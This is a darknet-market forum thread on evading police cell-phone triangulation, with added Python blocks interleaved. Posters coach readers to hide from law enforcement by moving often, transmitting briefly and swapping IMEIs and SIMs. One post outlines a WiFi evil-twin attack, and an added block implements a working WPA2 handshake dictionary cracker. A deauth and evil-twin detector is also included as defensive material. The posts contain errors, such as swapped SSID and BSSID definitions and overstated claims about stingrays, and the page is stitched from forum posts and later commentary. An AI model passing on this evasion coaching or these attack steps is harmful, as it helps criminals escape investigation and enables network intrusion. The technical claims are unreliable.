Cellular Phone Triangulation : OpSec | Torhoo darknet markets

From my understanding, locating a cellular phone via triangulation would require the phone to be within range of at least 2 signal towers that would provide the vertices for the calculation.

Does this mean that if a person was 100% certain that they were only within range of a single tower, triangulation would not be possible?

An example would be using the phone from a very remote location and utilising a signal booster with a long-range directional antenna to get a signal from a single tower.
Depending on your threat model and how determined LE is, they could still try to position you, especially if you don't change location and cell towers frequently. However, if you use different cell towers for short time periods, your position will be hard to locate.

Be aware that if you use a single cell tower regularly, LE can place a stingray in a strategic position and start to triangulate. Depending on how fast they act, they could potentially be able to locate your position with 100-400 m accuracy in a few minutes (depending on how lucky they are).

Another technique that LE might use is a directional signal detector, which will give them an approximation of the bearing, and depending on their guess about what signal effect you use, they can approximate the geographical area segment where you are most likely located.

In conclusion, you must relocate frequently and transmit only for short periods. Never transmit from a fixed location.
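The question and reply above are really about geometry: what a set of tower range measurements pins down, and what a bearing from a directional antenna adds. The following is an added worked example, not code from the thread or from any poster. Tower sites, the handset position and the range error are constructed values in flat x/y metres; a tower's "range" stands in for what it can estimate from timing advance or round-trip delay, and the 275 m range error used in the usage note is an assumed figure, roughly half a GSM timing-advance step.

```python
import math

# Constructed scenario (not from the thread): a handset at TRUE_POS and three
# tower sites, all in flat x/y metres. Each tower's range is what it could
# estimate from timing advance / round-trip delay; here it is computed exactly.
TRUE_POS = (1200.0, 800.0)
TOWER_SITES = [(0.0, 0.0), (5000.0, 0.0), (0.0, 4000.0)]


def measured_towers(sites=TOWER_SITES, pos=TRUE_POS):
    """(x, y, range) per tower; the ranges are noise-free for clarity."""
    return [(tx, ty, math.hypot(pos[0] - tx, pos[1] - ty)) for tx, ty in sites]


def trilaterate(towers):
    """Position from three or more (x, y, range) tuples.

    Subtracting tower 1's circle equation from each other tower's circle
    linearises the problem to a*x + b*y = c per tower; the (possibly
    overdetermined) system is solved via the normal equations. Returns None
    when the towers are collinear, i.e. the geometry is degenerate.
    """
    x1, y1, r1 = towers[0]
    rows = []
    for xi, yi, ri in towers[1:]:
        a = 2 * (xi - x1)
        b = 2 * (yi - y1)
        c = r1 ** 2 - ri ** 2 + xi ** 2 - x1 ** 2 + yi ** 2 - y1 ** 2
        rows.append((a, b, c))
    s_aa = sum(a * a for a, _, _ in rows)
    s_ab = sum(a * b for a, b, _ in rows)
    s_bb = sum(b * b for _, b, _ in rows)
    s_ac = sum(a * c for a, _, c in rows)
    s_bc = sum(b * c for _, b, c in rows)
    det = s_aa * s_bb - s_ab * s_ab
    if abs(det) < 1e-9:
        return None
    return ((s_bb * s_ac - s_ab * s_bc) / det, (s_aa * s_bc - s_ab * s_ac) / det)


def two_tower_candidates(t1, t2):
    """Two ranges leave two mirror-image candidates, one on each side of the
    line joining the towers (or none if the circles do not meet)."""
    x1, y1, r1 = t1
    x2, y2, r2 = t2
    d = math.hypot(x2 - x1, y2 - y1)
    if d == 0 or d > r1 + r2 or d < abs(r1 - r2):
        return []
    a = (r1 ** 2 - r2 ** 2 + d ** 2) / (2 * d)   # distance from t1 to the chord
    h = math.sqrt(max(r1 ** 2 - a ** 2, 0.0))    # half the chord length
    mx, my = x1 + a * (x2 - x1) / d, y1 + a * (y2 - y1) / d
    ox, oy = h * (y2 - y1) / d, h * (x2 - x1) / d
    return [(mx + ox, my - oy), (mx - ox, my + oy)]


def one_tower_with_bearing(tower, bearing_deg):
    """One range plus a compass bearing (0 = +y/north, clockwise) is a point."""
    x, y, r = tower
    th = math.radians(bearing_deg)
    return (x + r * math.sin(th), y + r * math.cos(th))


def single_tower_search_area(r, range_err, bearing_halfwidth_deg=None):
    """Area a single tower leaves to search: an annulus of width 2*range_err
    around radius r, or, if a directional detector narrows the bearing to
    +/- bearing_halfwidth_deg, only that wedge of the annulus."""
    annulus = math.pi * ((r + range_err) ** 2 - (r - range_err) ** 2)  # = 4*pi*r*range_err
    if bearing_halfwidth_deg is None:
        return annulus
    return annulus * (2 * bearing_halfwidth_deg / 360.0)


if __name__ == "__main__":
    towers = measured_towers()
    print("3 towers ->", trilaterate(towers))
    print("2 towers ->", two_tower_candidates(towers[0], towers[1]))
    print("1 tower annulus (m^2):", round(single_tower_search_area(3000, 275)))
    print("1 tower + bearing +/-15 deg (m^2):",
          round(single_tower_search_area(3000, 275, 15)))
```

With the constructed values, three towers give the handset position exactly, two towers give the true position and its mirror image across the line between them, and one tower alone gives only a ring. For a range of 3 km and an assumed 275 m range error the ring is roughly 10 km² of ground to search; a bearing known to ±15° from a directional antenna cuts that to one twelfth, which is the mechanism the reply above describes.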
/u/earpain
1 points
7 months ago*
/u/DaVenom confirms my research as well, but there are a few more gotchas to be aware of. If by chance OP, you, or anyone else reading this is familiar with 802.11 WiFi 'Evil Twin' attacks, it's very enlightening to compare IMSI Catcher aka Stingray aka 'Cell Site Simulator' attacks to Rogue AP aka Evil Twin attacks, but with one crucial difference.

So with an Evil Twin attack you sniff out 802.11 packets flying around you with the aid of your handy monitor-mode-capable WiFi device running on Linux, and you pick out an Access Point aka Station aka WiFi router that already has one or more devices connected to it. Once that's done, the attack just requires two simple steps that can be done simultaneously for optimal results:
1. Flood the real AP with 'poison packets' aka 'deauth' instructions, which is just like a DDoS attack minus the first D. The true router gets so overwhelmed trying to please everyone that its CPU/RAM just can't take any more and it crashes. You continue the storm of deauths to keep it offline.
2. Meanwhile, either with a second WiFi dongle or even with the same one if it's fancy enough, you begin transmitting a perfect copy of the AP that you just, for the moment, stamped out of existence. The magic happens when you are able to spoof the AP's hexadecimal name, SSID, its human-language name, BSSID, and its MAC address (the only crime, I think, within the jurisdiction of the FCC to enforce haha).
Edit: This works just as well, or maybe better, in reverse: you deauth and spoof a client that the router will handshake with, and said handshake is salted via a function that incorporates precise time, brand, and other incidental details that your evil little script already knows, since it is doing this in real time.
Once that's done you do not necessarily have to do any social engineering, because the clients that a moment ago were connected to an AP with the same SSID, BSSID, and MAC will just stupidly believe that your Evil Twin is the very same device and attempt to re-establish a connection. Such re-establishing in WPA2 requires a '4-way handshake', and somewhere within the exchanged packets of the aforementioned handshake there HAS TO BE a hash of the network's password. From there you can either brute force the password out or use social engineering.

Cell Site Simulators = They actually do ALL of the above-mentioned sneaky little tricks, but there's an essential difference. Cell phones are programmed to automatically switch their connection to whichever cell tower has the STRONGEST signal (closest/strongest = same thing). This is what makes it possible to be riding a high-speed train while yapping on the phone with your buddy. Your phone is in a 'which one of your cell towers is my strongest cell tower?' query loop, and if/when a new tower is detected with a stronger signal, not only will your phone connect to that tower without informing the probably clueless cell phone owner of such a switch, but also there's essentially nothing you can do about it!

But here's where the problems really begin: Your standard text messages and your voice calls will always do their first hop to the strongest tower (which in this case would be a sketchy-looking white van with a team of piggies in it, eating potato chips non-stop and staring for hours and hours). In an effort to not subject customers to planned obsolescence... or perhaps for a different reason, there's a special function built into the 'radio' circuit of cell phones regarding how to handle digitally encrypted information that uses a newer standard than the one built into a specific phone. A simple 'do it anyway' command can be sent that will just cause a cell phone to downgrade its digital encryption protocol. And the protocol it downgrades to can be brute forced SO QUICKLY with today's technology that high-end 'Site Simulator' devices (available only to law enforcement, of course) can literally brute-force decrypt all regular voice call and regular SMS data in real time. So, returning to the comparison with traffic over WiFi, it's similar to when you get that HTTP-but-no-HTTPS 'are you sure you want to proceed' error, but much, much easier to totally intercept and decrypt, and obviously the device otherwise forwards and receives all communication beyond the simulator so as not to tip off the victim of the attack. Last but not least, the so-called Cell Site Simulator devices can query any phone with one more simple command to pull the cellular plan subscriber data from it!

Thus, be it a service provided by the same company or a different one for liability reasons, there are cloud-based services made available to LE in large cities that aggregate EVERYTHING collected by every Cell Site Simulator active at any time and extrapolate the precise location of every person that lives in that city at any given time, even if your GPS etc. is off.
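The post above says the WPA2 4-way handshake has to carry something derived from the network password, which is what makes a captured handshake brute-forceable offline. Concretely, message 2 of the handshake carries a MIC that is an HMAC under the KCK, the first 16 bytes of the PTK, which is itself derived from the PMK, which is PBKDF2 of the passphrase and SSID. The block below is an added example, not code from the poster, showing that derivation and the offline dictionary test it enables. Every parameter in it (SSID, MAC addresses, nonces, the passphrase and the wordlist) is constructed for the demonstration; the EAPOL frame is a minimal message 2 with no RSN IE, which is enough to show what the MIC covers.

```python
import hashlib
import hmac

# Constructed handshake parameters (not captured from any real network).
SSID = "HomeNet"
AA = bytes.fromhex("020000000001")      # AP MAC (authenticator address)
SPA = bytes.fromhex("020000000002")     # client MAC (supplicant address)
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
REAL_PASSPHRASE = "correct horse battery"
WORDLIST = ["password", "HomeNet123", "correct horse battery", "letmein"]


def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)).
    The 802.11i PRF concatenates HMAC-SHA1 blocks tagged with a counter byte."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 * 20 bytes >= the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def build_eapol_msg2(snonce):
    """Minimal EAPOL-Key message 2 (client -> AP) with the MIC field zeroed,
    which is exactly the byte string the MIC is computed over."""
    body = (b"\x02"                           # descriptor type: RSN
            + b"\x01\x0a"                     # key info: MIC set, pairwise, version 2 (HMAC-SHA1)
            + b"\x00\x00"                     # key length
            + (1).to_bytes(8, "big")          # replay counter
            + snonce                          # key nonce (SNonce)
            + bytes(16) + bytes(8) + bytes(8) # key IV, key RSC, key ID
            + bytes(16)                       # MIC, zero while computing it
            + b"\x00\x00")                    # key data length (no RSN IE in this example)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type Key


def eapol_mic(kck, eapol_mic_zeroed):
    """Key descriptor version 2: MIC = HMAC-SHA1(KCK, frame) truncated to 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def mic_for(passphrase, ssid, aa, spa, anonce, snonce, frame):
    """The full chain: passphrase -> PMK -> PTK -> KCK -> MIC over message 2."""
    kck = wpa2_ptk(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return eapol_mic(kck, frame)


def constructed_capture():
    """What a passive sniffer gets: both MACs, both nonces, message 2 and its MIC.
    The MIC is produced here the way a genuine client would produce it."""
    frame = build_eapol_msg2(SNONCE)
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "frame": frame,
            "mic": mic_for(REAL_PASSPHRASE, SSID, AA, SPA, ANONCE, SNONCE, frame)}


def crack_wpa2(capture, wordlist):
    """Offline dictionary test: recompute the MIC per candidate passphrase and
    compare with the captured one. Returns the match or None."""
    for candidate in wordlist:
        mic = mic_for(candidate, capture["ssid"], capture["aa"], capture["spa"],
                      capture["anonce"], capture["snonce"], capture["frame"])
        if hmac.compare_digest(mic, capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    print("recovered:", crack_wpa2(constructed_capture(), WORDLIST))
```

Two things worth noting from the code rather than the post: nothing in the handshake is a plain "hash of the password"; it is a keyed MIC, and the attacker only gets to test candidates because the SSID, both nonces and both MACs travel in the clear. The cost per guess is the 4096-round PBKDF2, which is why the practical defence is passphrase length, not hiding the handshake.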
/u/isaacishmael
1 points
7 months ago
[removed]
My humble guess would be router logs. If the attack targeted the router, there should be at least some errors or restarts in the logs. If the attack targeted a client, it might be a bit more difficult. If you have all the connection logs, you could check whether there was a connection with the (false) client while you experienced downtime.

Of course, if your router got compromised as well after the attack, the tracks might've been erased.
Great read, thanks for this.
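The comment above looks for the attack in router logs. An added example, not from any poster here, of doing the same from the radio side: the two steps the earpain post describes (a deauth storm, then a look-alike AP) both leave traces in a monitor-mode capture, namely a burst of deauthentication frames from one transmitter and beacons for one SSID coming from more than one BSSID/channel combination. The frame records, MAC addresses and SSID below are constructed; the field names are this example's own, not any capture tool's.

```python
from collections import defaultdict, deque

DEAUTH = 12   # 802.11 management frame subtype: deauthentication
BEACON = 8    # 802.11 management frame subtype: beacon

REAL_AP = "aa:bb:cc:dd:ee:01"    # constructed
OTHER_AP = "aa:bb:cc:dd:ee:02"   # constructed, unrelated neighbour


def constructed_frames():
    """Constructed monitor-mode records, not a real capture.
    Fields: t (seconds), subtype, src (transmitter), bssid, ssid, channel."""
    frames = []
    # the real AP beaconing normally on channel 6, roughly every 100 ms
    for i in range(10):
        frames.append(dict(t=i * 0.1, subtype=BEACON, src=REAL_AP, bssid=REAL_AP,
                           ssid="HomeNet", channel=6))
    # a neighbour AP sending two legitimate deauths, well apart in time
    frames.append(dict(t=0.2, subtype=DEAUTH, src=OTHER_AP, bssid=OTHER_AP, ssid=None, channel=1))
    frames.append(dict(t=0.9, subtype=DEAUTH, src=OTHER_AP, bssid=OTHER_AP, ssid=None, channel=1))
    # a burst of 50 deauths in a quarter of a second, claiming to come from the real AP
    for i in range(50):
        frames.append(dict(t=0.40 + i * 0.005, subtype=DEAUTH, src=REAL_AP, bssid=REAL_AP,
                           ssid=None, channel=6))
    # beacons for the same SSID and cloned BSSID, but on channel 11: the twin
    for i in range(5):
        frames.append(dict(t=0.5 + i * 0.1, subtype=BEACON, src=REAL_AP, bssid=REAL_AP,
                           ssid="HomeNet", channel=11))
    return frames


def detect_deauth_flood(frames, threshold=10, window_s=1.0):
    """Transmitters that send more than `threshold` deauth frames inside any
    sliding window of `window_s` seconds."""
    flagged = set()
    recent = defaultdict(deque)
    for f in sorted(frames, key=lambda f: f["t"]):
        if f["subtype"] != DEAUTH:
            continue
        q = recent[f["src"]]
        q.append(f["t"])
        while f["t"] - q[0] > window_s:
            q.popleft()
        if len(q) > threshold:
            flagged.add(f["src"])
    return flagged


def detect_ssid_clash(frames):
    """SSIDs beaconed from more than one (BSSID, channel) pair. A twin using
    its own MAC shows up as a second BSSID; one that clones the BSSID still
    shows up if it sits on a different channel."""
    seen = defaultdict(set)
    for f in frames:
        if f["subtype"] == BEACON:
            seen[f["ssid"]].add((f["bssid"], f["channel"]))
    return {ssid: sorted(pairs) for ssid, pairs in seen.items() if len(pairs) > 1}


if __name__ == "__main__":
    fr = constructed_frames()
    print("deauth flood from:", detect_deauth_flood(fr))
    print("SSID clashes:", detect_ssid_clash(fr))
```

The caveat a practitioner will want: a twin that clones both the BSSID and the channel is invisible to `detect_ssid_clash`, so the deauth-rate check is the more robust of the two, and an AP that supports 802.11w (protected management frames) makes the deauth step itself fail rather than merely detectable.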
/u/Amadi
1 points
7 months ago
I want to point out that using a phone at a place where only one signal tower exists may raise a curiosity flag.
If someone sees you driving around a lonely field or forest, it's more likely they'll remember details of your appearance.
If you want to take this path, I encourage you to keep an eye on how you get to the location, how you behave there and how you leave it.
Triangulation is just physical positioning. It can be quite precise depending on the environment in which you operate, how many towers there are, and so on. Linking your activity is a bigger issue. Using a cellular hotspot anonymously without linkage of the activities requires a hardware-modded device that allows IMEI change, strong sanitation and behavioural discipline when changing SIM cards, and so on.

It is very complex and needs a clear understanding of the pros and cons.